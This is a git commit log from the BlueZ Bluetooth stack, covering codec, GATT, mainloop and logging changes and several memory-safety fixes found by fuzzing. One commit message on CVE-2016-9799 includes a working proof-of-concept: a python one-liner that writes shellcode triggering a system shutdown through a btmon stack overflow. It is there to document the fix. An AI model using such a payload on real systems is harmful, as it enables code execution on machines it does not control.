Pali Rohár [Sun, 23 Dec 2018 10:40:17 +0000 (11:40 +0100)]
a2dp-codecs: Define a2dp_vendor_codec_t struct in endian neutral way
And define new macros A2DP_GET_VENDOR_ID(), A2DP_GET_CODEC_ID() and
A2DP_SET_VENDOR_ID_CODEC_ID() for easily filling a2dp_vendor_codec_t
struct.
Change-Id: Ia517e52fce660b3e5f073a3009e460da0ca7a15a
Signed-off-by: himanshu <h.himanshu@samsung.com>
Pali Rohár [Sun, 23 Dec 2018 10:40:16 +0000 (11:40 +0100)]
a2dp-codecs & avinfo: Fix parsing MPEG bit rate values
Redefine bitrate field in a2dp_mpeg_t struct in endian neutral way and
separate vbr field according to A2DP specification. Define new macros
MPEG_GET_BITRATE() and MPEG_SET_BITRATE() for manipulating with bitrate
like for a2dp_aac_t struct.
And fix meaning of bitrate field. According to A2DP specification, it is
bitrate index, not bitrate itself. According to MPEG specification, each
MPEG layer have different bitrates for bitrate indexes. Therefore define
correctly bitrates for Layers 1, 2 and 3.
This fixes problems with parsing bitrate field in a2dp_mpeg_t struct as it
was broken due to endianity and it was broken for Layer 1 and 2 as bitrate
definitions was for Layer 3.
Change-Id: Ied2e860f5c54ccd6bbef7770959f5ac553022a56
Signed-off-by: himanshu <h.himanshu@samsung.com>
Pali Rohár [Sun, 23 Dec 2018 10:40:15 +0000 (11:40 +0100)]
a2dp-codecs: Fix codec id for ATRAC
According to Bluetooth Assigned Numbers for Audio/Video ATRAC has codec id 0x04.
See: https://www.bluetooth.com/specifications/assigned-numbers/audio-video
Change-Id: Ia45a0ec8a415f73f6180d3b684ee39c0c70a5e57
Signed-off-by: himanshu <h.himanshu@samsung.com>
Pali Rohár [Sun, 23 Dec 2018 10:40:14 +0000 (11:40 +0100)]
a2dp-codecs: Add SBC prefix for MIN/MAX_BITPOOL constants
Those two constants are SBC codec specific.
Change-Id: I184ab28fcc4566d02449ed07ac68c3e26d4c41cf
Signed-off-by: himanshu <h.himanshu@samsung.com>
Pali Rohár [Sun, 23 Dec 2018 10:40:13 +0000 (11:40 +0100)]
avinfo: Show Vendor Specific Data
Change-Id: I6ac47da5f045b7214531192d5e58c82ddb3eb9b8
Signed-off-by: himanshu <h.himanshu@samsung.com>
Pali Rohár [Sun, 23 Dec 2018 10:40:12 +0000 (11:40 +0100)]
avinfo: Fix buffer overflow when parsing broken/malicious data
Check size of buffer prior casting it to struct.
Change-Id: I8a3ee8d8bf2dfef7b37a7075f2062804268de639
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 18 Dec 2018 15:01:05 +0000 (12:01 -0300)]
unit/test-gdbus-client: Fix using invalid interface name
Each element must only contain the ASCII characters "[A-Z][a-z][0-9]_"
and must not begin with a digit so '-' cannot be used.
Change-Id: I176162c288973b9db672bbb9c5eacd896dd94b41
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 18 Dec 2018 15:02:22 +0000 (12:02 -0300)]
gdbus: Split validation of object path and interface
This splits the validation of object and interface so and error is
properly printed for each of those.
Change-Id: Ic936f70c7b94b9ec51c047d10d90628c66893cde
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 5 Dec 2018 23:57:51 +0000 (20:57 -0300)]
gdbus: Make sure the object path and interface are valid
D-Bus object path and interface must be validate otherwise it can cause
errors as follow:
0 0xb7f67ab1 in __kernel_vsyscall ()
1 0xb7ca1cc1 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
2 0xb7ca50ee in abort () at abort.c:92
3 0xb7e30ba5 in _dbus_abort () at dbus-sysdeps.c:94
4 0xb7e267a6 in _dbus_warn_check_failed (
format=0xb7e36cd4 "arguments to %s() were incorrect, assertion \"%s\" failed in file %s line %d.\nThis is normally a bug in some application using the D-Bus library.\n") at dbus-internals.c:290
5 0xb7e16d9f in dbus_message_iter_append_basic (iter=0xbf864400, type=111,
value=0xd70940) at dbus-message.c:2586
6 0x004fcdec in emit_interfaces_added (user_data=0xd70938)
at gdbus/object.c:574
Change-Id: I84ad3ffe13e16d6275fb5f9df4013a4804ad2aaf
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 5 Dec 2018 12:17:02 +0000 (09:17 -0300)]
avrcp: Fix error creating media items
Don't use item name in the object path since it would need to be
properly escaped if the remote stack uses UID 0 even though it is
invalid to have 0 as UID:
AVRCP 1.6.1, page 84:
'The value of UID=0x0 is a special value used only to request
the metadata for the currently playing media using the
GetElementAttributes command and shall not be used for any item
in a folder.'
Change-Id: Id31a0ed0ebab207b5552466a051f1b9161d7b76b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 4 Dec 2018 19:17:57 +0000 (16:17 -0300)]
gatt: Register GATT and GAP services as SDP records
This ensures that GATT and GAP services can be discover over SDP as well
as over GATT.
Change-Id: Ibf4ac7da55ba8eb63d5e5eacf0b8ded6ae4f1aa5
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:54:40 +0000 (16:54 +0200)]
shared/tester: Make use of mainloop_run_with_signal
This don't require setting up signalfd.
Change-Id: I2bc0b624e5768fc64085438054e3679cf8cbbe9b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:27:38 +0000 (16:27 +0200)]
core: Make use of mainloop_run_with_signal
This don't require setting up signalfd.
Change-Id: I662835f2fb18e3d30aca89dc2150b977a46db939
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:01:40 +0000 (16:01 +0200)]
shared/mainloop: Remove mainloop_set_signal
This removes mainloop_set_signal and replaces it usage with
mainloop_run_with_signal.
Change-Id: I7354a76436348520ee814c513294fdfe80a33c41
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 28 Nov 2018 13:41:35 +0000 (15:41 +0200)]
shared/mainloop: Add mainloop_run_with_signal
This consolidates the handling of signalfd in similar ways as ELL does.
Change-Id: Iaf082f7534a7444a7b3fc29ed5a6423f666f3f86
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 26 Nov 2018 16:01:47 +0000 (18:01 +0200)]
shared/timeout-glib: Check 0 id when removing timeout
If the id is 0 that makes it is invalid already.
Change-Id: Icd116c07be4db784ee8cd0be66560b14a74bc069
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 26 Nov 2018 15:48:50 +0000 (17:48 +0200)]
core: Use mainloop_sd_notify instead of sd_notify
mainloop_sd_notify takes care of sending the messages to NOTIFY_SOCKET
and includes the handling of WATCHDOG_USEC as well.
Change-Id: Ibaf2e3af9cd0d492cd10576f671e16d54dcca287
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 26 Nov 2018 14:23:37 +0000 (16:23 +0200)]
tool/btmon-logger: Use mainloop_notify instead of sd_notify
mainloop_notify takes care of sending the messages to NOTIFY_SOCKET and
includes the handling of WATCHDOG_USEC as well.
Change-Id: Iea22016e179e2714e94ac89dfa8c06d21573c277
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 26 Nov 2018 14:16:15 +0000 (16:16 +0200)]
share/mainloop: Add watchdog support
This adds watchdog notification support by sending "WATCHDOG=1" twice
as frequent as required by WATCHDOG_USEC.
Change-Id: I713883290a03961276d8f981818abbc922018bd0
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 26 Nov 2018 13:54:00 +0000 (15:54 +0200)]
share/mainloop: Add handling of NOTIFY_SOCKET
This adds handling of systemd NOTIFY_SOCKET so application using
mainloop instance do properly notify systemd what is their state.
Change-Id: Ie58d7641eb76c8e77482ad78e86ed0ecac0e0ae5
Signed-off-by: himanshu <h.himanshu@samsung.com>
Tedd Ho-Jeong An [Thu, 29 Nov 2018 23:24:26 +0000 (15:24 -0800)]
tools/btpclient: Fix compile warning with strncpy
This patch fixes the boundry warning-to-error in GCC 8.1.1 with strncpy.
Change-Id: I606199afaa5de1dc56f043160b1f6a53f3092b81
Signed-off-by: himanshu <h.himanshu@samsung.com>
Marcel Holtmann [Mon, 3 Dec 2018 18:48:08 +0000 (19:48 +0100)]
tools: Use l_main_run_with_signal instead of open coding it
Change-Id: Idca5ab5133fad95a9480c0216ad377c777d96f61
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Fri, 9 Nov 2018 06:37:09 +0000 (12:07 +0530)]
btmgmt: Add BREDR PHYs in PHY Configuration commands
This basically adds BREDR packet types also in the PHY confiuration
commands & events and makes the PHYs 32 bit so that it can be
extended in future. This also add configurable PHYs in the GetPhy
command wherein only those can be selected or deselected in SetPhy.
This also adds LE prefix for LE phys to make it more
descriptive
Change-Id: I77442839d02acc308078f355037820c11f026d00
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jan Engelhardt [Sun, 25 Nov 2018 09:20:05 +0000 (10:20 +0100)]
build: rename includedir to pkgincludedir
This change is similar to commit 5.50-130-g78bce4800 and does the
same, but for includedir.
Change-Id: Ie9601a14e5375a5974f0a5f846dea5608f93786e
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 22 Nov 2018 15:57:19 +0000 (17:57 +0200)]
shell: Fix artifacts when asking for user input
Instead of printing a message use set the new prompt so it is carried
over when new lines are printed. Unfortunately this has some drawbacks
as apparently readline is not really able to redisplay properly if the
prompt contain colors.
Change-Id: Iab1a1f1d485b89e446631b5f1554fbc829359e06
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 15 Nov 2018 13:53:46 +0000 (15:53 +0200)]
log: Use shared log code
Use bt_log_* to send messages to the logging channel.
Change-Id: I7d6fccb39c4570e68929d677082f4625990298a4
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 20 Nov 2018 13:23:49 +0000 (15:23 +0200)]
shared/shell: Add option to print to monitor
This adds option -m/--monitor which send output to btmon using
libshared bt_log:
= bluetoothctl: power on
= bluetoothctl: Changing power on succeeded
Change-Id: If99dc6a7090ed9b477beafe4b90fa59f357fb8b3
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 15 Nov 2018 13:52:07 +0000 (15:52 +0200)]
shared/tester: Make use of shared log
Use bt_monitor_* to send messages to the logging channel.
Change-Id: I96565c0b15441d7c8753b4b5c48397d6ef8719bd
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 7 Nov 2018 12:26:50 +0000 (14:26 +0200)]
shared/log: Add common code to interface with logging channel
This enables any code using shared to log information using the logging
channel which can then be decoded by the likes of btmon.
Change-Id: Ic910de61ec3b4f291f0ceb801a5b5a3925c9f0b2
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 19 Nov 2018 13:36:15 +0000 (15:36 +0200)]
client: Switch from write to sendmsg for Acquire*
Use sendmsg with MSG_NOSIGNAL to prevent crashes involving SIGPIPE.
Change-Id: Ib461b3ede9ead18e832a66f75ff5fde06e37cc83
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 19 Nov 2018 12:19:31 +0000 (14:19 +0200)]
doc/gatt-api: Restrict supported file descriptors
Only support sockets with AcquireWrite/AcquireNotify since pipe don't
work with sendmsg therefore MSG_NOSIGNAL cannot be used.
Change-Id: If0767e9087f875ac2e19a7e4853973f49ca8ad4b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 19 Nov 2018 15:19:39 +0000 (17:19 +0200)]
gatt: Fix invalid read when disconnecting
In case there is a client of AcquireNotify and a disconnect happens the
code not only have to free the client object but also destroy the io
associated with it, for this reason the client object cannot be freed
until the io is destroyed otherwise it may lead to the following error:
Invalid read of size 4
at 0x63920: notify_io_destroy (gatt-client.c:1461)
by 0x63EDB: pipe_io_destroy (gatt-client.c:1082)
by 0x6405B: characteristic_free (gatt-client.c:1663)
by 0x81F33: remove_interface (object.c:667)
by 0x826CB: g_dbus_unregister_interface (object.c:1391)
by 0x85D2B: queue_remove_all (queue.c:354)
by 0x635F7: unregister_service (gatt-client.c:1893)
by 0x85CF7: queue_remove_all (queue.c:339)
by 0x661DF: btd_gatt_client_service_removed (gatt-client.c:2199)
by 0x695CB: gatt_service_removed (device.c:3747)
by 0x85B17: queue_foreach (queue.c:220)
by 0x91283: notify_service_changed (gatt-db.c:280)
by 0x91283: gatt_db_service_destroy (gatt-db.c:291)
Address 0x515ed48 is 0 bytes inside a block of size 20 free'd
at 0x483EAD0: free (vg_replace_malloc.c:530)
by 0x85D2B: queue_remove_all (queue.c:354)
by 0x636D3: unregister_characteristic (gatt-client.c:1741)
by 0x85D2B: queue_remove_all (queue.c:354)
by 0x635F7: unregister_service (gatt-client.c:1893)
by 0x85CF7: queue_remove_all (queue.c:339)
by 0x661DF: btd_gatt_client_service_removed (gatt-client.c:2199)
by 0x695CB: gatt_service_removed (device.c:3747)
by 0x85B17: queue_foreach (queue.c:220)
by 0x91283: notify_service_changed (gatt-db.c:280)
by 0x91283: gatt_db_service_destroy (gatt-db.c:291)
by 0x85D2B: queue_remove_all (queue.c:354)
by 0x91387: gatt_db_clear_range (gatt-db.c:475)
Change-Id: If5d5159c7fc59f4f3b88afb863eb0b0644ddee09
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 14 Nov 2018 11:35:37 +0000 (13:35 +0200)]
avctp: Fix possible crash when accepting browsing channel
In order to stop the bt_io_accept from calling the callback with
invalid session, if that is disconnected in the meantime, create the
channel so it can properly be destroyed thus stopping the callback from
being called.
Change-Id: If89847141f3062361cbc0b8a1235eeee0e7edf34
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 1 Nov 2018 13:59:23 +0000 (15:59 +0200)]
unit/test-sdp: Add robustness test for continuation state
This adds a test for invalid continuation state:
/TP/SERVER/SA/ROB/BI-01-C - init
/TP/SERVER/SA/ROB/BI-01-C - setup
/TP/SERVER/SA/ROB/BI-01-C - setup complete
/TP/SERVER/SA/ROB/BI-01-C - run
test-sdp: < 02 00 01 00 16 35 11 1c 00 00 01 00 00 00 10 00 .....5..........
test-sdp: 80 00 00 80 5f 9b 34 fb 00 01 00 ...._.4....
bluetoothd[26193]: process_request: Got a svc srch req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 17
bluetoothd[26193]: extract_des: Data type: 0x1c
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: service_search_req: Expected count: 1
bluetoothd[26193]: service_search_req: Bytes scanned : 19
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 0
bluetoothd[26193]: service_search_req: Checking svcRec : 0x0
bluetoothd[26193]: service_search_req: Checking svcRec : 0x1
bluetoothd[26193]: service_search_req: Checking svcRec : 0x10000
bluetoothd[26193]: service_search_req: Match count: 1
bluetoothd[26193]: process_request: Sending rsp. status 0
bluetoothd[26193]: process_request: Bytes Sent : 14
test-sdp: > 03 00 01 00 09 00 01 00 01 00 01 00 00 00 ..............
test-sdp: < 04 00 01 00 0f 00 01 00 00 00 07 35 06 09 00 00 ...........5....
test-sdp: 09 00 01 00 ....
bluetoothd[26193]: process_request: Got a svc attr req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 6
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 2
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 0
bluetoothd[26193]: service_attr_req: SvcRecHandle : 0x10000
bluetoothd[26193]: service_attr_req: max_rsp_size : 7
bluetoothd[26193]: extract_attrs: Entries in attr seq : 2
bluetoothd[26193]: extract_attrs: AttrDataType : 9
bluetoothd[26193]: extract_attrs: AttrDataType : 9
bluetoothd[26193]: service_attr_req: Creating continuation state of size : 18
bluetoothd[26193]: sdp_set_cstate_pdu: Non null sdp_cstate_t id : 0x5bdb0511
bluetoothd[26193]: process_request: Sending rsp. status 0
bluetoothd[26193]: process_request: Bytes Sent : 23
test-sdp: > 05 00 01 00 12 00 07 35 10 09 00 00 0a 00 08 11 .......5........
test-sdp: 05 db 5b 07 00 00 00 ..[....
test-sdp: < 04 00 02 00 17 00 01 00 00 00 07 35 06 09 00 00 ...........5....
test-sdp: 09 00 01 08 11 05 db 5b ff ff 00 00 .......[....
bluetoothd[26193]: process_request: Got a svc attr req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 6
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 2
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 8
bluetoothd[26193]: sdp_cstate_get: Cstate TS : 0x5bdb0511
bluetoothd[26193]: sdp_cstate_get: Bytes sent : 65535
bluetoothd[26193]: service_attr_req: SvcRecHandle : 0x10000
bluetoothd[26193]: service_attr_req: max_rsp_size : 7
bluetoothd[26193]: NULL cache buffer and non-NULL continuation state
bluetoothd[26193]: process_request: Sending rsp. status 5
bluetoothd[26193]: process_request: Bytes Sent : 7
test-sdp: > 01 00 02 00 02 00 05 .......
/TP/SERVER/SA/ROB/BI-01-C - test passed
/TP/SERVER/SA/ROB/BI-01-C - teardown
/TP/SERVER/SA/ROB/BI-01-C - teardown complete
/TP/SERVER/SA/ROB/BI-01-C - done
Change-Id: I9312545d675dab69e64d22779e02ac7da923bb42
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 28 Sep 2018 13:08:32 +0000 (16:08 +0300)]
sdp: Fix buffer overflow
sdp_append_buf shall check if there is enough space to store the data
before copying it.
An independent security researcher, Julian Rauchberger, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure
program.
Change-Id: I15d089ecda58b507776767f595c3006cd3f8b90c
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 28 Sep 2018 12:04:42 +0000 (15:04 +0300)]
sdp: Fix not checking if cstate length
cstate length should be smaller than cached length otherwise the
request shall be considered invalid as the data is not within the
cached buffer.
An independent security researcher, Julian Rauchberger, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure
program.
Change-Id: I16873b4ca1eda39c28d6737a66db08a6206c6bfb
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 1 Nov 2018 13:55:12 +0000 (15:55 +0200)]
monitor: Decode error response
This adds decoding for the error code in the error response:
> test-sdp: User Data RX
Channel: 0 len 7 [PSM 1 mode 0] {chan 0}
SDP: Error Response (0x01) tid 2 len 2
Error code: Invalid Continuation State (0x0005)
Change-Id: Ie72b90f076e36a75a9fef91cdef235070ad28d1b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Cho, Yu-Chen [Wed, 31 Oct 2018 08:15:08 +0000 (16:15 +0800)]
hcidump: Fix set_ext_ctrl() global buffer overflow
Fix set_ext_ctrl() global buffer overflow.
Change-Id: I7b03dc961b1c74d372817bedb35d11b39d475bda
Signed-off-by: himanshu <h.himanshu@samsung.com>
Cho, Yu-Chen [Wed, 31 Oct 2018 08:15:07 +0000 (16:15 +0800)]
hcidump:fixed hci frame dump stack-buffer-overflow
hci_dump() didn't check the length of frame, and it would be
a stack-buffer-overflow error.
Change-Id: I9ed90053c242aa174485c3038ada9a182b3004ca
Signed-off-by: himanshu <h.himanshu@samsung.com>
Łukasz Rymanowski [Wed, 24 Oct 2018 10:17:18 +0000 (12:17 +0200)]
btmon: Add colors to data status in extended adv report
This patch gives color indicators to data status in extended
advertising reports. This gives better visibility on which advertising
events were completed or truncated.
Change-Id: I79a3cd8eec85eb08ad07a6083ee33a8e77b0ea5e
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 29 Oct 2018 13:13:25 +0000 (15:13 +0200)]
gatt: Fix not removing disconnect handler properly
Previous patch did not really fixed the crash since the bt_server would
be freed already which makes bt_att instance to be passed as NULL to
bt_att_unregister_disconnect which makes it not the take the expected
action.
Change-Id: Icd15b693e6ea59eb080f76d1735c9f537d61ba3b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 25 Oct 2018 07:09:37 +0000 (10:09 +0300)]
gatt: Fix crash on disconnect
This fix a crash when ATT disconnects causing the following trace:
Invalid read of size 8
at 0x47CD9A: att_disconnected (gatt-database.c:335)
by 0x4E04F5: disconn_handler (att.c:539)
by 0x4DACD0: queue_foreach (queue.c:220)
by 0x4E23D8: disconnect_cb (att.c:592)
by 0x4F0A58: watch_callback (io-glib.c:170)
by 0x50D788C: g_main_context_dispatch (in /usr/lib64/libglib-2.0.so.0.5600.3)
by 0x50D7C57: ??? (in /usr/lib64/libglib-2.0.so.0.5600.3)
by 0x50D7F81: g_main_loop_run (in /usr/lib64/libglib-2.0.so.0.5600.3)
by 0x40D336: main (main.c:808)
Address 0x9aed3c0 is 0 bytes inside a block of size 40 free'd
at 0x4C2FDAC: free (vg_replace_malloc.c:530)
by 0x47CE78: att_disconnected (gatt-database.c:358)
by 0x47F9FF: btd_gatt_database_att_disconnected (gatt-database.c:3540)
by 0x4AAB8E: gatt_server_cleanup (device.c:584)
by 0x4AAC26: attio_cleanup (device.c:601)
by 0x4ADDF1: att_disconnected_cb (device.c:4865)
by 0x4E04F5: disconn_handler (att.c:539)
by 0x4DACD0: queue_foreach (queue.c:220)
by 0x4E23D8: disconnect_cb (att.c:592)
by 0x4F0A58: watch_callback (io-glib.c:170)
by 0x50D788C: g_main_context_dispatch (in /usr/lib64/libglib-2.0.so.0.5600.3)
by 0x50D7C57: ??? (in /usr/lib64/libglib-2.0.so.0.5600.3)
Change-Id: Ib180cf7f7abb076cc94d2e08434a0cdf91134bd0
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 25 Apr 2018 12:29:51 +0000 (15:29 +0300)]
shared/gatt-server: Add bt_gatt_server_get_att
This adds bt_gatt_server_get_att which can be used to get the bt_att
instance attached to the server.
Change-Id: If00def71f2ec7369162b8808524836fcd59c1b44
Signed-off-by: himanshu <h.himanshu@samsung.com>
Marcel Holtmann [Sat, 20 Oct 2018 05:23:11 +0000 (07:23 +0200)]
monitor: Use static inline for functions in header files
Change-Id: Ic65292f68c4e74778780dce4a1163d2e9bef7b9c
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:24:15 +0000 (23:24 +0300)]
btmon: fix segfault caused by buffer overflow
Buffer overflow vulnerability in monitor/sdp.c SDP continuation handling
caused btmon to crash. This happens in global static buffer which makes
it non-trivial to exploit.
This is nasty bug in a way that this can be triggered also over the air
by sending malformed SDP Search Attribute request to device running
btmon.
This crash was foung by fuzzing btmon with AFL. Seems to be reproducible
also with Synopsys Defensics SDP Server suite.
Change-Id: Ie149945cd95f6686183944e358cf25b485c769c4
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:23:12 +0000 (23:23 +0300)]
btmon: fix segfault caused by integer undeflow
Fix segfault caused by integer underflow. Fix is to check that
rsp->num_codecs + 3 is not bigger than size before subtracting.
Crash was found by fuzzing btmon with AFL.
Change-Id: I9af6ee12b4bf58d33ee81412ddd6c47ef49acac8
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:22:42 +0000 (23:22 +0300)]
btmon: fix segfault caused by integer underflow
Fix segfault caused by integer underflow in set_event_filter_cmd().
Fix is to check that size is big enough before subtracting to prevent
underflow.
Crash was found by fuzzing btmon with AFL.
Change-Id: I2e8c45af686bc86beb20221118240958afa58426
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:21:50 +0000 (23:21 +0300)]
btmon: fix stack buffer overflow
Arbitrary code execution vulnerability was discovered in btmon.
pklg_read_hci function read from file attacker controllable
amount of data which caused stack buffer overflow.
Fixes old and previously unfixed CVE-2016-9799.
Initially this was reported by op7ic:
https://www.spinics.net/lists/linux-bluetooth/msg68898.html
Later this was re-discovered by fuzzing btmon with AFL.
Proof-of-concept exploit that shutowns the machine:
$ python -c 'print "\x00\x00\x0c\x10"+ "\x90"*609 +"\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"+ "\x90"*847 +"\xb0\xda\xff\xff\xff\x7f\x00\x00"' > exploit
$ ./btmon -r exploit
Proof of concept requires that ASLR is disabled and following CFLAGS are
set: -fno-stack-protector -zexecstack
Change-Id: I75934ef2c759e5dab3ed025d4d8bf5041523a2de
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:22:16 +0000 (23:22 +0300)]
btmon: fix multiple segfaults
Fix multiple segfaults caused by buffer over-read in packet_hci_command,
packet_hci_event and packet_hci_acldata. Fix is to check that index is
not bigger than MAX_INDEX before accessing index_list.
Crashes were found by fuzzing btmon with AFL.
Change-Id: Iaba0be9da71154eaeff3be86e8afa5eeb74dd354
Signed-off-by: himanshu <h.himanshu@samsung.com>
Matias Karhumaa [Tue, 16 Oct 2018 20:19:38 +0000 (23:19 +0300)]
btmon: fix segfault caused by buffer over-read
Fix segfault caused by buffer over-read. Check that index is not
bigger than MAX_INDEX.
This bug was found by fuzzing with AFL.
Program received signal SIGSEGV, Segmentation fault.
0x0000000000420bb8 in print_packet (tv=<optimized out>, cred=<optimized out>, ident=<optimized out>, index=<optimized out>, channel=<optimized out>, color=<optimized out>,
label=<optimized out>, text=<optimized out>, extra=<optimized out>) at monitor/packet.c:317
warning: Source file is more recent than executable.
317 index_list[index].frame != last_frame) {
(gdb) bt
#0 0x0000000000420bb8 in print_packet (tv=<optimized out>, cred=<optimized out>, ident=<optimized out>, index=<optimized out>, channel=<optimized out>, color=<optimized out>,
label=<optimized out>, text=<optimized out>, extra=<optimized out>) at monitor/packet.c:317
#1 0x000000000041a8c3 in packet_new_index (tv=<optimized out>, index=<optimized out>, name=0x7fffffffda68 "rsion 4.18.0-matias-patch2 (x86_64)", label=<optimized out>,
type=<optimized out>, bus=<optimized out>) at monitor/packet.c:9818
#2 packet_monitor (tv=0x7fffffffda50, cred=<optimized out>, index=<optimized out>, opcode=<optimized out>, data=0x7fffffffda60, size=<optimized out>) at monitor/packet.c:3881
#3 0x000000000040e177 in control_reader (path=<optimized out>, pager=true) at monitor/control.c:1462
#4 0x0000000000403b00 in main (argc=<optimized out>, argv=<optimized out>) at monitor/main.c:243
Change-Id: I1c3bf298ebfb11f5cace8c245d30fdc068bc6606
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 8 Oct 2018 07:35:53 +0000 (10:35 +0300)]
shared/shell: Fix parsing of tool name
Fix leaving leading '/' when parsing tool name.
Change-Id: Ifc7fd6fde54923e64d25c1a33e1d16c873f86732
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 5 Oct 2018 08:50:46 +0000 (11:50 +0300)]
unit: Make use of tester_monitor to print input/output PDUs
tester_monitor will forward the data to btmon when -m/--monitor is
enabled which will attempt to decode the PDUs:
= test-gatt: /robustness/unkown-command - init 11:44:53.464325
= test-gatt: /robustness/unkown-command - setup
= test-gatt: /robustness/unkown-command - setup complete
= test-gatt: /robustness/unkown-command - run
< test-gatt: User Data TX
ATT: Exchange MTU Request (0x02) len 2
Client RX MTU: 23
> test-gatt: User Data RX
ATT: Exchange MTU Response (0x03) len 2
Server RX MTU: 512
< test-gatt: User Data TX
ATT: Unknown (0xff) len 1
00 .
= test-gatt: /robustness/unkown-command - test passed
= test-gatt: /robustness/unkown-command - teardown
= test-gatt: /robustness/unkown-command - teardown complete
= test-gatt: /robustness/unkown-command - done
Change-Id: I44bd1f913f02a953301dc1e0a4b87a448219e7f0
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 4 Oct 2018 13:09:22 +0000 (16:09 +0300)]
shared/tester: Add option to print to monitor
This adds option -m/--monitor that can be used together with
tester_monitor to send protocol data to be decoded by btmon.
In addition to that this also logs the tester output into btmon since
that has support to store its output on file this can be quite
convenient for reporting.
Change-Id: Ie5f3c6fef0f0f590111ddd0bf36485345e2e317f
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 5 Oct 2018 08:47:47 +0000 (11:47 +0300)]
monitor: Add support for user input/output data
This detects if the user logging is an input/output and then proceed to
decode the header which inform for which CID and PSM the data is for.
Change-Id: Idc21d2f1473f4b77569cea49c4a8ccd6c5e7c78a
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 1 Oct 2018 11:10:08 +0000 (14:10 +0300)]
gatt: Fix not cleaning up device state properly
If the device is removed locally device_free would end up calling
bt_att_unref which won't trigger any disconnect callback necessary
to remove device states.
